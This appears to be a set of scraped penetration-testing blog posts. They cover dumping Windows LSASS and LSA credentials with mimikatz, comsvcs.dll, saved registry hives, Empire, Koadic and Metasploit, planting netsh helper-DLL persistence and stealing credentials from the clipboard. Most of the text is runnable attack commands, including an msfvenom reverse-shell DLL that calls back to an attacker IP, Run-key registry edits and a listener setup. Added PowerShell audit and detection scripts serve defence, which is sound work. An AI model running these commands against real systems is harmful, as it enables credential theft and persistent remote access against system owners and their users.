sekurlsa::minidump C:\Users\raj\Downloads\Procdump\mem.dmp
sekurlsa::logonpasswords

And now, as you can see from the image below, we’ve got a clear-text password.

Method 3: comsvcs.dll

comsvcs.dll, found in Windows\System32, exports a MiniDump function that can be called through rundll32, so it can dump the memory of lsass.exe without bringing any extra tool onto the host. The call needs the process ID of lsass and SeDebugPrivilege, so run it from an elevated PowerShell prompt. First identify the PID, then pass it to MiniDump (492 in our case; substitute the PID you obtained):

Get-Process Lsass
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 492 C:\mem.dmp full

Again, repeat the same steps and use mimikatz to read mem.dmp:

privilege::debug
sekurlsa::minidump C:\mem.dmp
sekurlsa::logonpasswords

Again, we’ve got a clear-text password.

Windows 10 (LSA) Credential Dump

Method 1: Task manager

lsass.exe still exists on Windows 10, but the Processes tab of Task Manager lists it under its description, "Local Security Authority Process" (the Details tab still shows lsass.exe). Creating a dump works the same way and again produces a .dmp file, so repeat the steps above.

Go to the Task Manager and explore the process for Local Security Authority, then extract its dump as shown.

As before, the file is saved as lsass.DMP in the Temp directory of the user profile (%LOCALAPPDATA%\Temp).

Again, repeat the same steps and use mimikatz to read the .dmp file:

privilege::debug
sekurlsa::minidump C:\Users\raj\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

This time we only obtain NT hashes rather than clear-text passwords, as you can see in the image below. Since Windows 8.1 the WDigest provider no longer caches clear-text passwords in lsass by default (the UseLogonCredential registry value is treated as 0 unless an administrator re-enables it), which is why the Windows 7 dumps above contained passwords and the Windows 10 dump does not.
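Whether a dump yields passwords or only hashes, and whether an unsigned tool can open lsass.exe at all, depends on three settings. The following check is added here as an example and is not part of the original article or of mimikatz; it assumes an elevated PowerShell 5.1+ session and reads the WDigest UseLogonCredential value, the Lsa RunAsPPL value (LSA Protection) and the Device Guard status for Credential Guard, then states what a memory dump is expected to contain on this host.

```powershell
# Added example, not from the original article: report what a dump of lsass.exe will
# contain on this host and whether an unsigned user-mode tool can open the process at all.
# Assumes an elevated PowerShell 5.1+ session.

function Get-LsaCredentialPosture {
    $os      = [Version](Get-CimInstance -ClassName Win32_OperatingSystem).Version
    $wdigest = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -ErrorAction SilentlyContinue
    $lsa     = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $dg      = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue

    # WDigest keeps clear-text passwords in lsass when UseLogonCredential is 1. When the value is
    # absent, the default is 1 before Windows 8.1 (NT 6.3) and 0 from Windows 8.1 onwards.
    $clearText = if ($null -ne $wdigest.UseLogonCredential) { $wdigest.UseLogonCredential -eq 1 }
                 else { $os -lt [Version]'6.3' }

    # RunAsPPL >= 1 runs lsass.exe as a protected process (LSA Protection); user-mode tools,
    # including mimikatz without its kernel driver, are then denied a handle to it.
    $lsaProtection = ($lsa.RunAsPPL -ge 1)

    # SecurityServicesRunning contains 1 when Credential Guard is active; domain secrets are
    # then held in an isolated process instead of lsass.
    $credGuard = ($dg.SecurityServicesRunning -contains 1)

    $expected = if ($credGuard)     { 'local account hashes only; domain secrets are isolated' }
                elseif ($clearText) { 'clear-text passwords of logged-on users (the Windows 7 result)' }
                else                { 'NT hashes and Kerberos keys, no clear-text (the Windows 10 result)' }

    $dumpByUnsigned = if ($lsaProtection) { 'blocked (requires a kernel driver)' } else { 'allowed with SeDebugPrivilege' }

    [pscustomobject]@{
        OSVersion          = $os
        WDigestClearText   = $clearText
        LsaProtection      = $lsaProtection
        CredentialGuard    = $credGuard
        ExpectedFromDump   = $expected
        DumpByUnsignedTool = $dumpByUnsigned
    }
}

Get-LsaCredentialPosture | Format-List
```

Run it on both lab hosts before dumping: the Windows 7 box reports WDigestClearText True, the Windows 10 box False, which matches the two results in this section. Setting UseLogonCredential back to 1 on a patched host re-enables clear-text caching, a change worth alerting on in its own right.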

Method 2: Mimikatz parameter -patch

The /patch argument patches samsrv.dll inside lsass.exe so that the LM and NT hashes of the local accounts can be read directly. Executing the following commands dumps the password hashes:

privilege::debug
lsadump::lsa /patch

Method 3: Mimikatz – Token Elevation

Here we use mimikatz once more to read the LSA secrets directly, without a dump file or a DLL. Running the following commands as a local administrator, without SYSTEM rights, produces an error:

privilege::debug
lsadump::secrets

The fix is token impersonation: token::elevate impersonates a SYSTEM token (the default; a domain admin token can be chosen instead), after which the same command returns the LSA secrets in clear text.

privilege::debug
token::elevate
lsadump::secrets

Method 4: Editing File Permission in the Registry

The LSA secrets live in the registry under HKLM\SECURITY. If services run as a local or domain user, their passwords are stored there, and if auto-logon is configured the logon password is stored there as well.

The same result can be obtained locally by changing permissions in the registry. Open regedit and navigate to Computer\HKEY_LOCAL_MACHINE\SECURITY.

Right-click the SECURITY key and choose Permissions from the menu.

Grant the Administrator user "Full Control", as shown.

This time the subkeys under SECURITY become visible.

Now, running the following commands again returns the credentials in plain text:

privilege::debug
lsadump::secrets

Method 5: Saving the Registry Hives

Similarly, the secrets can be taken offline. Save the SYSTEM and SECURITY hives with the following commands (run elevated):

reg save HKLM\SYSTEM system
reg save HKLM\security security

If you run lsadump::secrets without arguments you cannot retrieve the password, but if you pass the saved hive files, mimikatz decrypts the LSA secrets from them and dumps the password in plain text:

privilege::debug
lsadump::secrets /system:c:\system /security:c:\security

PowerShell Empire

Empire is a good penetration-testing framework that works much like Metasploit; download it from GitHub and install it on your attacking machine to launch attacks remotely.

This is a post-exploitation step, so the host must already be compromised; then use the following module to dump the LSA secrets:

usemodule credentials/mimikatz/lsadump
execute

As a result, it dumps password hashes saved as shown in the given image.

Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration-testing tools such as Meterpreter and PowerShell Empire. Its comsvcs_lsass module runs the comsvcs.dll MiniDump technique shown above, fetches the dump of lsass.exe and retrieves the stored NTLM hashes from it.

use comsvcs_lsass

As a result, it dumped the password hashes saved as shown in the given image.

Metasploit

Method 1: Load kiwi

Metasploit is the Swiss Army knife of this work: among its many modules it lets the attacker run mimikatz remotely and read the lsass memory to fetch credentials. This is post-exploitation, so you need a meterpreter session on the host first; then load kiwi to initialise mimikatz and run the command:

load kiwi
lsa_dump_secrets

Method 2: Load powershell

Similarly, you can load the powershell extension instead of kiwi and perform the same operation with the PowerShell version of mimikatz (Invoke-Mimikatz.ps1). Import the script, open a PowerShell prompt through the session and call it:

load powershell
powershell_import /root/powershell/Invoke-Mimikatz.ps1
powershell_shell
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

This dumps the password hashes as shown in the image below.

Conclusion: In this post you learned how the Local Security Authority stores credentials and saw several techniques for extracting them, either as clear-text passwords or as hashes. None of them replaces lsass.exe: they either read the memory of the running process (Task Manager, ProcDump, comsvcs.dll, sekurlsa) or decrypt the LSA secrets held in the SECURITY hive (lsadump), so defenders should watch for processes opening handles to lsass.exe and for reads, permission changes or saves of the SECURITY hive.
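Every method in this article that reads lsass.exe memory first has to open a handle to the process, and Sysmon records that as Event ID 10 (ProcessAccess). The hunt below is added here as an example and is not part of the original article or of any of the tools it covers; it assumes Sysmon is installed with a ProcessAccess rule that includes lsass.exe and that the script runs elevated. The allowlist of source images is a constructed placeholder to be tuned per environment.

```powershell
# Added example (not from the original article): hunt for processes that opened lsass.exe
# with memory-read rights, using Sysmon Event ID 10 (ProcessAccess).
# Assumes Sysmon is installed with a ProcessAccess rule covering lsass.exe and an elevated session.

function Get-LsassAccessEvents {
    param(
        [datetime]$Since = (Get-Date).AddDays(-1),
        # Constructed allowlist; tune to the security agents present in your environment.
        [string[]]$KnownGood = @('C:\Windows\System32\csrss.exe', 'C:\Windows\System32\wininit.exe',
                                 'C:\Windows\System32\svchost.exe')
    )
    # PROCESS_VM_READ (0x10) is required to read another process's memory; MiniDumpWriteDump also
    # asks for PROCESS_QUERY_INFORMATION (0x400). Filtering on the bit catches uncommon masks too.
    $memoryRead = 0x10

    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Flatten the EventData <Data Name="..."> elements into a hashtable.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        if ($data.TargetImage -notlike '*\lsass.exe') { return }
        $granted = [Convert]::ToInt32($data.GrantedAccess, 16)   # GrantedAccess is logged as hex, e.g. 0x1FFFFF
        if (($granted -band $memoryRead) -eq 0) { return }
        if ($data.SourceImage -in $KnownGood) { return }

        [pscustomobject]@{
            Time          = $_.TimeCreated
            SourceImage   = $data.SourceImage
            SourcePid     = $data.SourceProcessId
            GrantedAccess = $data.GrantedAccess
            CallTrace     = $data.CallTrace
        }
    }
}

Get-LsassAccessEvents | Sort-Object Time | Format-Table -AutoSize -Wrap
```

Commonly reported GrantedAccess values for these events are 0x1010 and 0x1410 for mimikatz sekurlsa and 0x1FFFFF (PROCESS_ALL_ACCESS) for ProcDump and Task Manager, so a Taskmgr.exe, procdump.exe or rundll32.exe row here maps directly onto the methods above. The methods that re-permission or save the SECURITY hive never touch lsass memory and need separate coverage, for example registry object auditing on HKLM\SECURITY.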


Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Credential Dumping: Local Security Authority (LSA|LSASS.EXE) appeared first on Hacking Articles.

Windows Persistence using Netsh


In this article, we are going to describe the ability of the Netsh process to provide persistent access to the Target Machine.

Table of Content

  • Introduction
  • Configurations used in Practical
  • Crafting Payload
  • Payload Transfer
  • Tweaking the Registry
  • Listener Configuration & Gaining Persistence
  • Detection
  • Mitigation

Introduction

Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh also provides a scripting feature that allows you to run a group of commands in batch mode against a specified computer. Netsh can also save a configuration script in a text file for archival purposes or to help you configure other servers.

Netsh contains functionality to add helper DLLs for extending the functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.

Before we move on to gaining the persistence on the system, keep in mind that we have already compromised the system using well-known methods. Read about them here.

Configurations used in Practical

Attacker:

  • OS: Kali Linux 2020.1
  • IP: 192.168.1.112

Target:

  • OS: Windows 10
  • IP: 192.168.1.104

Crafting Payload

From the introduction it is clear that netsh loads helper DLLs. So, if we plan to use netsh to gain a persistent shell on the target machine, we need a malicious DLL. We used msfvenom to create it. The system we compromised earlier is a 64-bit version, which is easy to confirm with the systeminfo command.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.112 lport=1234 -f dll > raj.dll

Payload Transfer

Since we already have a meterpreter session on the target, we transfer the payload we crafted to it. We place it in the System32 directory, where almost all of the system's DLLs live, purely to hide in plain sight; this requires elevated privileges on the target. The DLL could be stored anywhere else, in which case its full path must be used when registering the helper. We used the meterpreter upload command for the transfer.

cd C:\Windows\System32
upload /root/raj.dll .

Tweaking the Registry

With the payload on the target, we pop a Windows shell and make two changes: add a Run entry so that netsh is launched at every logon, and register the DLL with the add helper command so that netsh loads it each time it starts.

shell
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v raj /t REG_SZ /d "C:\Windows\System32\netsh"
netsh add helper raj.dll

Listener Configuration & Gaining Persistence

Before moving to the Target System, we created a multi/handler listener with some configurations that we used while crafting the payload and we kept it ready for when the payload gets executed on the Target Machine resulting in a persistence shell.

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.112
set lport 1234
exploit
sysinfo

The shell came back through the netsh instance in no time. Let's look at the registry changes that gave us this persistence.

Detection

We created a value named "raj" under the Run key that points at the netsh executable, so netsh is started on every logon. Because netsh is a common utility in server and workstation environments, an entry for it in Run rarely raises suspicion.

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Now we move to another location in the registry. When the add helper command runs, netsh creates a value with the same name as the DLL under the following key:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh

Mitigation

  • Periodically audit the registry at the following locations:
    • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NetSh
  • Keep an eye out for registry changes made from any kind of shell (WMIC, Command Prompt, PowerShell)
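The two registry locations above can be checked automatically. The script below is added here as an example and is not part of the original article; it assumes an elevated PowerShell 5.1+ session. It resolves every registered netsh helper to a file, verifies that the file exists and carries a valid Microsoft signature, and separately lists Run and RunOnce entries that launch netsh, which is what the two indicators from the Detection section look like on a compromised host.

```powershell
# Added example (not from the original article): audit netsh helper DLLs and Run entries that
# launch netsh. Assumes an elevated PowerShell 5.1+ session on Windows 10 or later.

function Get-NetshHelperAudit {
    $helperKey = 'HKLM:\SOFTWARE\Microsoft\NetSh'
    $props = Get-ItemProperty -Path $helperKey
    # Every non-PS* property is a registered helper: name -> DLL name or path (e.g. ifmon -> ifmon.dll).
    $helpers = $props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }

    foreach ($h in $helpers) {
        $value = [string]$h.Value
        # A bare file name goes through the DLL search order; netsh.exe lives in System32, so that is
        # where such a helper is normally loaded from (assumption: default SafeDllSearchMode).
        $path = if ([IO.Path]::IsPathRooted($value)) { $value } else { Join-Path $env:SystemRoot "System32\$value" }
        $exists = Test-Path -LiteralPath $path
        # Get-AuthenticodeSignature also recognises catalog-signed system DLLs on Windows 10+;
        # on older releases Microsoft DLLs may show NotSigned, so treat 'review' as a prompt, not a verdict.
        $sig = if ($exists) { Get-AuthenticodeSignature -FilePath $path } else { $null }

        $verdict =
            if (-not $exists) { 'missing on disk' }
            elseif ($sig.Status -ne 'Valid') { "signature status $($sig.Status); review" }
            elseif ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') { 'signed by non-Microsoft publisher; review' }
            else { 'ok' }

        [pscustomobject]@{ Helper = $h.Name; Value = $value; ResolvedPath = $path; Verdict = $verdict }
    }
}

function Get-NetshRunEntries {
    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   # only the current user's hive
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }) {
            # Matches "C:\Windows\System32\netsh" as well as "netsh.exe ..." command lines.
            if ([string]$p.Value -match '(?i)\bnetsh(\.exe)?\b') {
                [pscustomobject]@{ Key = $key; Name = $p.Name; Command = $p.Value }
            }
        }
    }
}

Get-NetshHelperAudit | Where-Object Verdict -ne 'ok' | Format-Table -AutoSize -Wrap
Get-NetshRunEntries | Format-Table -AutoSize -Wrap
```

Against the lab host from this article the first table shows raj.dll resolved to C:\Windows\System32\raj.dll with an unsigned status, and the second shows the raj Run value pointing at netsh. Remove the helper with netsh delete helper raj.dll and the Run value with reg delete, then delete the DLL.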

That's all for netsh persistence. No built-in utility is safe; keep an eye on all of them, even those that seem harmless.


Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

The post Windows Persistence using Netsh appeared first on Hacking Articles.

Credential Dumping: Clipboard


In this article, we look at password managers and at dumping credentials from them via the clipboard. Passwords are not easy to remember, especially when they are made up of alphanumeric and special characters, and these days there is a password for everything. Reusing the same password for every account is insecure, so many people rely on password managers such as KeePass, Bitwarden and others to store all of their passwords.

Table of Content:

  • PowerShell Empire
  • Metasploit Framework
  • Koadic

In our practical, we used the Bitwarden password manager to keep our password secure. It is convenient to use, and even if we forget a password we can copy it from the vault and paste it where we need it. As you can see in the image below, we saved our password in Bitwarden and copied it from there.

PowerShell Empire

Whenever credentials are copied like this, an attacker on the machine can retrieve them from the clipboard in several ways. PowerShell Empire has a module for exactly this; once you have an agent, run the following commands to execute it:

usemodule collection/clipboard_monitor
execute

Once the module is executed, whenever the copied password is pasted as shown in the image below:


Then those credentials will be displayed in the console as shown in the image below:

Metasploit Framework

In Metasploit, a meterpreter session offers additional command sets through extensions. One of them is loaded with load extapi; its commands can be listed with a question mark (?) and include a group of clipboard management commands. We use them to start a clipboard monitor and then dump whatever has been copied, including the password pasted from the manager:

load extapi
clipboard_monitor_start
clipboard_monitor_dump

As you can see in the image, the clipboard monitor has captured the username and password.

Koadic

Just like PowerShell Empire, Koadic has a built-in module for dumping clipboard data. Once you have a session in Koadic, type the following commands to get the clipboard contents:

use clipboard
execute

And this way, again, we have the credentials.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Credential Dumping: Clipboard appeared first on Hacking Articles.
